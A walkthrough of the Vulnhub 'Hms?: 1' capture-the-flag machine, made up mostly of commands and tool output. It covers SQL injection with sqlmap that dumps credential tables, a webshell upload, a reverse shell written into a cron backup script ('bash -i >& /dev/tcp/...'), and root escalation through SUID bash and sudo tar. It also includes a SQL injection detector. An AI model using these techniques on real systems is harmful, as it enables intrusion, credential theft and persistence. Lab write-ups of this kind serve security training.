[Vulnhub Lab] [Hms?: 1] [Easy] [20210728]

2024/11/29 12:40:17

1. Environment

Lab page: https://www.vulnhub.com/entry/hms-1,728/
Download: https://download.vulnhub.com/hms/niveK.ova
Difficulty: Easy
Release date: 2021-07-28
File size: 2.9 GB
Author: niveK
Series: Hms?
Description:

  • This works better with VirtualBox than with VMware.

Time spent: 3+ hours. The process itself is fairly simple; it is just easy to overlook details.
Key steps:

  1. Web directory scanning, SQL injection scanning
  2. Static review and modification of the HTML
  3. Crafting and uploading an image webshell, intercepting and modifying the request with Burp
  4. Linux information gathering, SUID privilege escalation, sudo privilege escalation

2. Host discovery and port scanning

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.31   08:00:27:58:73:29       PCS Systemtechnik GmbH

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.465 seconds (103.85 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.31        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:05 EST
Nmap scan report for 192.168.56.31
Host is up (0.00079s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3c:fc:ed:dc:9b:b3:24:ff:2e:c3:51:f8:33:20:78:40 (RSA)
|   256 91:5e:81:68:73:68:65:ec:a2:de:27:19:c6:82:86:a9 (ECDSA)
|_  256 a7:eb:f6:a2:c6:63:54:e1:f5:18:53:fc:c3:e1:b2:28 (ED25519)
7080/tcp open  http    Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Admin Panel
|_Requested resource was login.php
MAC Address: 08:00:27:58:73:29 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (95%), Linux 3.13 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.79 ms 192.168.56.31

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.88 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 21,22,7080 192.168.56.31      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:12 EST
Nmap scan report for 192.168.56.31
Host is up (0.00054s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
7080/tcp open  empowerid
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-trace: TRACE is enabled
| http-enum: 
|   /login.php: Possible admin folder
|   /test.php: Test page
|   /files/: Potentially interesting folder w/ directory listing
|   /icons/: Potentially interesting folder w/ directory listing
|_  /pages/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:58:73:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 35.16 seconds

3. Service access

3.1. Port 21 - FTP anonymous login

  • Nothing at all in there; presumably meant for uploading a backdoor
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.31                    
Connected to 192.168.56.31.
220 (vsFTPd 3.0.3)
Name (192.168.56.31:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||34008|)
150 Here comes the directory listing.
226 Directory send OK.
ftp>

3.2. Port 7080 - Web

  • Information gathered from the page source
<meta name="keywords" content="Admin , Responsive">
<meta name="author" content="Nikhil Bhalerao +919423979339.">

<!-- for any PHP, Codeignitor or Laravel work contact me at mayuri.infospace@gmail.com -->


4. Directory scanning

# Basic small wordlist, initial sweep
dirb http://192.168.56.31:7080
# More thorough; conda activate py37
dirsearch -u http://192.168.56.31:7080 -t 64 -e *
# Includes static checks; conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.31:7080" -j yes -b yes
# More thorough, Plus; conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.31:7080 -lcf
# Regular file scan
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# Executable file scan
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# Archive and backup file scan
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://192.168.56.31:7080/index.php
  • http://192.168.56.31:7080/login.php
  • http://192.168.56.31:7080/test.php
  • http://192.168.56.31:7080/footer.php
  • http://192.168.56.31:7080/header.php
  • http://192.168.56.31:7080/head.php
  • http://192.168.56.31:7080/logout.php
  • http://192.168.56.31:7080/profile.php
  • http://192.168.56.31:7080/signup.php
  • http://192.168.56.31:7080/connect.php
  • http://192.168.56.31:7080/sidebar.php
  • http://192.168.56.31:7080/forgot_password.php
  • http://192.168.56.31:7080/cgi-bin/
  • http://192.168.56.31:7080/files/
  • http://192.168.56.31:7080/pages/
  • http://192.168.56.31:7080/phpmyadmin

4.1. cgi-bin directory scan (nothing found)

dirsearch -u http://192.168.56.31:7080/cgi-bin/ -f -e cgi,sh

4.2. phpmyadmin directory scan (nothing found)

[screenshot]

4.3. test.php

[screenshot]

5. Fuzzing

5.1. test.php (failed)

ffuf -u "http://192.168.110.133/dashboard.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.110.133/dashboard.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.110.133/dashboard.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

5.2. connect.php (failed)

ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.56.31:7080/connect.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

6. Login page

6.1. Password brute force (failed)

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# hydra -l mayuri.infospace@gmail.com -P /usr/share/wordlists/rockyou.txt -f -t 64 -s 7080 192.168.56.31 http-post-form "/login.php:user=admin&email=^USER^&password=^PASS^&btn_login=:Invalid Email or Password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-12 03:55:10
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://192.168.56.31:7080/login.php:user=admin&email=^USER^&password=^PASS^&btn_login=:Invalid Email or Password
[STATUS] 12450.00 tries/min, 12450 tries in 00:01h, 14331949 to do in 19:12h, 64 active
[STATUS] 13194.33 tries/min, 39583 tries in 00:03h, 14304816 to do in 18:05h, 64 active
[STATUS] 13431.00 tries/min, 94017 tries in 00:07h, 14250382 to do in 17:42h, 64 active
[STATUS] 12999.62 tries/min, 195211 tries in 00:15h, 14149188 to do in 18:09h, 64 active

6.2. sqlmap

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.31:7080/login.php" --batch -forms --level=3 --risk=3
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" --level=3 --risk=3
......
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 3710 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: user=admin&email=mayuri.infospace@gmail.com' OR NOT 7284=7284-- mqNu&password=123&btn_login=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=admin&email=mayuri.infospace@gmail.com' OR (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x716b786271,(SELECT (ELT(4185=4185,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ASVf&password=123&btn_login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=admin&email=mayuri.infospace@gmail.com' AND (SELECT 5572 FROM (SELECT(SLEEP(5)))CQDF)-- xlcH&password=123&btn_login=
---
[04:38:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.29, Apache 2.4.48, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:38:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:38:20 /2023-11-12/
  • The output contains this passage:
[04:37:42] [INFO] testing if POST parameter 'email' is dynamic
[04:37:42] [WARNING] POST parameter 'email' does not appear to be dynamic
[04:37:42] [INFO] heuristic (basic) test shows that POST parameter 'email' might be injectable (possible DBMS: 'MySQL')
[04:37:42] [INFO] testing for SQL injection on POST parameter 'email'
[04:37:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:37:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[04:37:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[04:37:46] [INFO] POST parameter 'email' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --not-string="Login")
  • The output above shows that the "email" parameter is open to the "universal password" login bypass, of the form "or 1=1"
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" --dbs
......
[04:39:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.29, Apache 2.4.48, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:39:16] [INFO] fetching database names
[04:39:17] [INFO] starting 3 threads
[04:39:17] [INFO] retrieved: 'clinic_db'
[04:39:17] [INFO] retrieved: 'phpmyadmin'
[04:39:17] [INFO] retrieved: 'performance_schema'
[04:39:18] [INFO] retrieved: 'information_schema'
[04:39:18] [INFO] retrieved: 'test'
[04:39:18] [INFO] retrieved: 'mysql'
available databases [6]:
[*] clinic_db
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[04:39:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:39:18 /2023-11-12/
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D clinic_db --tables
......
Database: clinic_db
[24 tables]
+----------------------+
| admin                |
| user                 |
| appointment          |
| billing              |
| billing_records      |
| department           |
| doctor               |
| doctor_timings       |
| manage_website       |
| medicine             |
| orders               |
| patient              |
| payment              |
| prescription         |
| prescription_records |
| room                 |
| service_type         |
| tbl_email_config     |
| tbl_permission       |
| tbl_permission_role  |
| tbl_role             |
| tbl_sms_config       |
| treatment            |
| treatment_records    |
+----------------------+

[04:40:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:40:43 /2023-11-12/
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D clinic_db --dump-all
......
Database: clinic_db
Table: admin
[1 entry]
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+
| id | loginid                | role_id | dob        | addr                          | fname           | image       | lname | notes                  | gender | mobileno   | password                                                         | username | created_on | last_login | updated_on | delete_status |
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+
| 1  | ndbhalerao91@gmail.com | 1       | 2018-11-26 | <p>Maharashtra, India</p>\r\n | Nikhil Bhalerao | profile.jpg | admin | <p>admin panel</p>\r\n | Male   | 9423979339 | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 | admin    | 2018-04-30 | 0000-00-00 | 2019-10-15 | 0             |
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+

Database: clinic_db
Table: patient
[1 entry]
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+
| loginid        | patientid | dob        | city   | gender | address             | pincode | status   | mobileno   | password                                                         | bloodgroup | patientname | admissiondate | admissiontime | delete_status |
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+
| atul@gmail.com | 1         | 1995-07-25 | nashik | Male   | nashik, maharashtra | 1234    | Active   | 9423979339 | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 | B+         | Atul Petkar | 2020-05-25    | 11:00:00      | 0             |
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+

Database: clinic_db
Table: tbl_sms_config
[1 entry]
+----+--------------+------------+--------------+-------------------+---------------+
| id | sms_senderid | created_at | sms_password | sms_username      | delete_status |
+----+--------------+------------+--------------+-------------------+---------------+
| 1  | UPTURN       | 2019-10-10 | 123456789    | nikhilbhalerao007 | 0             |
+----+--------------+------------+--------------+-------------------+---------------+

Database: clinic_db
Table: doctor
[1 entry]
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+
| loginid         | doctorid | departmentid | status   | mobileno   | password                                                         | education | doctorname      | experience | delete_status | consultancy_charge |
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+
| akash@gmail.com | 1        | 1            | Active   | 9423979339 | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 | MD        | Dr. Akash Ahire | 3.0        | 0             | 200.00             |
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+

Database: clinic_db
Table: tbl_role
[3 entries]
+----+-------------+-------------+---------------+
| id | slug        | role_name   | delete_status |
+----+-------------+-------------+---------------+
| 1  | admin       | Admin       | 0             |
| 2  | client      | client      | 0             |
| 3  | technicians | Technicians | 0             |
+----+-------------+-------------+---------------+

Database: clinic_db
Table: tbl_email_config
[1 entry]
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
| e_id | name                      | mail_port | mail_encrypt | mail_password | mail_username             | mail_driver_host  |
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
| 1    | Upturn India Technologies | 587       | sdsad        | x(ilz?cWumI2  | contact.info@upturnit.com | mail.upturnit.com |
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D phpmyadmin --dump-all
......
Database: phpmyadmin
Table: pma__userconfig
[1 entry]
+----------+---------------------+---------------------------------------------------+
| username | timevalue           | config_data                                       |
+----------+---------------------+---------------------------------------------------+
| root     | 2021-07-25 22:05:10 | {"Console\\/Mode":"collapse","NavigationWidth":0} |
+----------+---------------------+---------------------------------------------------+
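The login pattern sqlmap flagged above, as an added example written for this write-up rather than code from the lab's application: a string-concatenated query that the `email` value escapes, the parameterized fix, and a small detector keyed on the three payload shapes in the sqlmap output. The table, the account and the SHA-256 hashing of the password column are constructed assumptions (the dump only shows 64-hex-character values and two accounts sharing one hash, which indicates an unsalted hash).

```python
"""Vulnerable vs. parameterized login lookup, plus a detector for the payload
shapes in the sqlmap output above (added example; constructed data)."""
import hashlib
import re
import sqlite3


def sha256_hex(text: str) -> str:
    # Assumption: the 64-hex-character password column is SHA-256; the dump does not say.
    return hashlib.sha256(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for clinic_db.admin with only the columns a login needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, loginid TEXT, password TEXT, username TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin@example.invalid', ?, 'admin')",
                 (sha256_hex("constructed-password"),))
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    # User input is pasted into the SQL text, so a quote in `email` ends the
    # literal and `OR 1=1-- ` comments out the password check entirely.
    query = (f"SELECT username FROM admin WHERE loginid = '{email}' "
             f"AND password = '{sha256_hex(password)}'")
    return conn.execute(query).fetchone()


def login_fixed(conn: sqlite3.Connection, email: str, password: str):
    # Bound parameters: values travel separately from the SQL text, so the same
    # quote is just part of an email address that matches no row.
    query = "SELECT username FROM admin WHERE loginid = ? AND password = ?"
    return conn.execute(query, (email, sha256_hex(password))).fetchone()


# Request-level detector keyed on the three payload families sqlmap reported:
# quote + OR/AND comparison (boolean-based), FLOOR(RAND()) (error-based), SLEEP() (time-based).
_INJECTION_PATTERNS = [
    re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\S+\s*=\s*\S+", re.I),
    re.compile(r"--\s"),                       # trailing MySQL comment marker
    re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    re.compile(r"\bSLEEP\s*\(", re.I),
]


def looks_like_injection(value: str) -> bool:
    """Cheap alerting heuristic for a WAF rule or access-log review; not a substitute for the fix."""
    return any(p.search(value) for p in _INJECTION_PATTERNS)


if __name__ == "__main__":
    db = make_db()
    bypass = "x' OR 1=1-- "
    print("vulnerable:", login_vulnerable(db, bypass, "wrong"))   # ('admin',)
    print("fixed:     ", login_fixed(db, bypass, "wrong"))        # None
    print("flagged:   ", looks_like_injection(bypass))            # True
```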

6.3. Logging in with the universal password

  • Nothing exploitable was found after logging in

6.4. Static review of the HTML reveals a comment

  • It reveals an image upload feature

7. Crafting the image webshell

  • Press and hold the image and drag it to the address bar to get the image URL

  • The upload succeeded and the file is reachable at: http://192.168.56.31:7080/uploadImage/Logo/OIP-C.jpeg

7.1. AntSword connection failed

[screenshot]

7.2. Uploading PHP directly

[screenshots]

8. Linux information gathering

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086                                
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.31] 56574
bash: cannot set terminal process group (1298): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
daemon@nivek:/home/nivek$

8.1. bash ≤ 4.3 is affected by the Shellshock vulnerability

8.2. General information gathering

  • Suspicious file: /home/eren/backup.sh
bash-4.3$ history
history
    1  history
bash-4.3$ whoami
whoami
daemon
bash-4.3$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
bash-4.3$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
bash-4.3$ crontab -l
crontab -l
no crontab for daemon
bash-4.3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * eren /home/eren/backup.sh
bash-4.3$ hostnamectl
hostnamectl
   Static hostname: nivek
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 99f028fc308708b4fb97c8ab60fd0e7c
           Boot ID: 5d158f2d4c5f46c5949a9e0e697b83fb
    Virtualization: oracle
  Operating System: Ubuntu 16.04 LTS
            Kernel: Linux 4.4.0-21-generic
      Architecture: x86-64
bash-4.3$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
bash-4.3$ echo $BASH_VERSION
echo $BASH_VERSION
4.3.42(1)-release
bash-4.3$

8.3. File information gathering

  • Found three created user accounts: nivek, apache, eren

daemon@nivek:/home/nivek$ ls -al
ls -al
total 104
drwxr-xr-x 16 nivek nivek 4096 Jul 26  2021 .
drwxr-xr-x  4 root  root  4096 Jul 26  2021 ..
-rw-------  1 nivek nivek  425 Jul 26  2021 .bash_history
-rw-r--r--  1 nivek nivek  220 Jul 25  2021 .bash_logout
-rw-r--r--  1 nivek nivek 3771 Jul 25  2021 .bashrc
drwx------ 13 nivek nivek 4096 Jul 26  2021 .cache
drwx------ 14 nivek nivek 4096 Jul 26  2021 .config
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Desktop
-rw-r--r--  1 nivek nivek   25 Jul 25  2021 .dmrc
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Documents
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Downloads
drwx------  2 nivek nivek 4096 Jul 26  2021 .gconf
drwx------  3 nivek nivek 4096 Jul 26  2021 .gnupg
-rw-------  1 nivek nivek  942 Jul 26  2021 .ICEauthority
drwx------  3 nivek nivek 4096 Jul 26  2021 .local
-rw-r--r--  1 root  root    33 Jul 25  2021 local.txt
drwx------  5 nivek nivek 4096 Jul 26  2021 .mozilla
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Music
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Pictures
-rw-r--r--  1 nivek nivek  675 Jul 25  2021 .profile
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Public
-rw-r--r--  1 nivek nivek    0 Jul 25  2021 .sudo_as_admin_successful
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Templates
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Videos
-rw-------  1 nivek nivek   50 Jul 26  2021 .Xauthority
-rw-------  1 nivek nivek 1354 Jul 26  2021 .xsession-errors
-rw-------  1 nivek nivek 1788 Jul 26  2021 .xsession-errors.old
daemon@nivek:/home/nivek$ cat local.txt
cat local.txt
3bbf8c168408f1d5ff9dfd91fc00d0c1
daemon@nivek:/usr/sbin$ cat /home/eren/backup.sh
cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
  • There is a bash binary with the SUID bit set and owned by eren:
    • -rwsr-xr-x 1 eren eren 1037464 Jul 26 2021 /usr/bin/bash
daemon@nivek:/usr/sbin$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/opt/lampp/bin/suexec
daemon@nivek:/usr/sbin$ find / -user eren -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
<eren -perm -u=s -type f -exec ls -al {} \; 2>/dev/null                      
-rwsr-xr-x 1 eren eren 1037464 Jul 26  2021 /usr/bin/bash

9. Moving to the eren account

daemon@nivek:/usr/sbin$ /usr/bin/bash -p
/usr/bin/bash -p
bash-4.3$ echo "bash -i >& /dev/tcp/192.168.56.3/7777 0>&1" >> /home/eren/backup.sh
</dev/tcp/192.168.56.3/7777 0>&1 >> /home/eren/backup.sh                    
bash-4.3$ cat /home/eren/backup.sh
cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash -i >& /dev/tcp/192.168.56.3/7777 0>&1
bash-4.3$
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 7777                 
listening on [any] 7777 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.31] 41074
bash: cannot set terminal process group (9314): Inappropriate ioctl for device
bash: no job control in this shell
eren@nivek:~$

10. Privilege escalation to root

eren@nivek:~$ history
history
eren@nivek:~$ sudo -l
sudo -l
Matching Defaults entries for eren on nivek:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eren may run the following commands on nivek:
    (root) NOPASSWD: /bin/tar
eren@nivek:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
</dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash       
tar: Removing leading `/' from member names
SHELL=/bin/bash script -q /dev/null
root@nivek:~# cd /root
cd /root
root@nivek:/root# ls -al
ls -al
total 136
drwx------ 19 root root  4096 Jul 26  2021 .
drwxr-xr-x 23 root root  4096 Nov 12 15:10 ..
-rw-------  1 root root  2377 Jul 26  2021 .bash_history
-rw-r--r--  1 root root  3121 Jul 26  2021 .bashrc
drwx------ 11 root root  4096 Jul 26  2021 .cache
drwx------ 13 root root  4096 Jul 25  2021 .config
drwx------  3 root root  4096 Jul 25  2021 .dbus
drwxr-xr-x  3 root root 20480 Jul 25  2021 Desktop
drwxr-xr-x  2 root root  4096 Jul 25  2021 Documents
